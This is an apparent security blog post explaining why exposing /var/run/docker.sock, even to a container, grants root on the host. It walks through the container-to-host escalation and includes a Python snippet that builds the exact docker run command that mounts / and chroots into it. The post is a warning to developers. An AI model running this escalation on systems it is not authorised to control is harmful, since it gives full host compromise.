Don't expose the Docker socket (not even to a container)
Docker primarily works as a client that communicates with a daemon
process (dockerd) over a socket. Typically that socket is a UNIX
domain socket called /var/run/docker.sock. That daemon is highly
privileged: it effectively has root access. Any process that can
write to the dockerd socket therefore also effectively has root
access.
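As a rough way to check whether a given process falls into that category, here is a minimal Python sketch. It assumes the default socket path mentioned above; the function name `can_write_docker_socket` is made up for illustration and is not part of Docker or any library.

```python
import os
import stat

# Default path named in the text; an assumption if your daemon is
# configured differently.
DOCKER_SOCKET = "/var/run/docker.sock"


def can_write_docker_socket(path: str = DOCKER_SOCKET) -> bool:
    """Return True if `path` is a UNIX socket this process may write to."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        # Missing path, or no permission to stat it: treat as not writable.
        return False
    # Only a socket counts; a regular file at this path is not the daemon.
    # os.access() checks against the real UID/GID of the process.
    return stat.S_ISSOCK(mode) and os.access(path, os.W_OK)


if __name__ == "__main__":
    if can_write_docker_socket():
        print("Write access to the Docker socket: treat this process as root on the host.")
    else:
        print("No write access to the Docker socket from this process.")
```

Running this as your regular user on the host, and again inside any container that has the socket mounted, gives a quick inventory of where that effective root access lives.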
This is no big secret. Docker clearly documents this in a bunch of
places, including the introductory documentation. It's an excellent
reason to use Docker Machine for development purposes, even on
Linux. If your regular user can write to the dockerd socket, then
every code execution vulnerability comes with a free privilege
escalation.
The warnings around the Docker socket typically come with a (sometimes implicit) context of being on the host to begin with. Write access to the socket as an unprivileged user on the host may mean privileged access to the host, but there seems to be some confusion about what happens when you get write access to the socket from a container.
The two most common misconceptions seem to be that it either doesn't
grant elevated privileges at all, or that it grants you privileged
access within the container (and without a way to break out). Both
are false; write access to the Docker socket is root on the host,
regardless of where that write comes from. This is different from
Jérôme Petazzoni's dind, which gives you Docker-in-Docker; we're
talking about access to the host's Docker socket.
The process works like this:
- The Docker container gets a docker client of its own, pointed at /var/run/docker.sock.
- The Docker container launches a new container mounting / on /host. This is the host root filesystem, not the first container's.
- The second container chroots to /host, and is now effectively root on the host. (There are a few differences between this and a clean login shell; for example, /proc/self/cgroup will still show Docker cgroups. However, the attacker has all of the permissions necessary to work around this.)
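To make those steps concrete, here is a small Python sketch that only builds and prints the single docker invocation they boil down to; it does not run anything. The image name `alpine` and the helper name `host_root_command` are assumptions for illustration. Any image that ships a `chroot` binary would do, and the host is assumed to have `/bin/sh`.

```python
import shlex
from typing import List

# Default socket path from the text.
DOCKER_SOCKET = "/var/run/docker.sock"


def host_root_command(image: str = "alpine",
                      socket_path: str = DOCKER_SOCKET) -> List[str]:
    """Build the argv for the escalation described above (illustrative only)."""
    return [
        "docker",
        "-H", f"unix://{socket_path}",  # step 1: client pointed at the host's socket
        "run", "--rm", "-it",
        "-v", "/:/host",                # step 2: mount the host's / on /host
        image,                          # hypothetical image choice
        "chroot", "/host", "/bin/sh",   # step 3: chroot into the host filesystem
    ]


if __name__ == "__main__":
    # Print the command rather than executing it.
    print(shlex.join(host_root_command()))
```

The bind mount is resolved by the daemon on the host, not by the container issuing the request, which is why `/` here means the host's root filesystem.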
This is identical to the process you'd use to escalate from outside of a container. Write access to the Docker socket is root on the host, full stop; who's writing, or where they're writing from, doesn't matter.
Unfortunately, there are plenty of development teams unaware of this property. I recently came across one, and ended up making a screencast to unambiguously demonstrate the flaw in their setup (which involved a container with write access to the Docker socket).
This isn't new; it's been a known property of the way Docker works
ever since the (unfortunately trivially cross-site scriptable) REST
API listening on a local TCP port was replaced with the
/var/run/docker.sock UNIX domain socket.